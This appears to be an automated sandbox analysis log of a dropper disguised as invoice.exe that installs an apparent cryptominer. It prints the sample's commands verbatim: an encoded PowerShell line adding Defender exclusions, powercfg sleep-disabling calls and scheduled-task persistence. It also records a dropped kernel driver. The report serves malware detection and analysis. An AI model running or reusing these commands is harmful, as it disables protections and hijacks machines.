                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe "4usfliof.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe "yee9mbi69cm7.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\Desktop\invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: invoice.exeStatic file information: File size 1262619 > 1048576
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: invoice.exe
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2894124210.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb3> source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb2 source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.000000000089D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5853546Jump to behavior
                  Source: invoice.exeStatic PE information: section name: .didat
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: 4usfliof.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1
                  Source: yee9mbi69cm7.exe.0.drStatic PE information: section name: .aliz1

                  Persistence and Installation Behavior

                  barindex
                  Sample is not signed and drops a device driver
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeJump to dropped file
                  Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
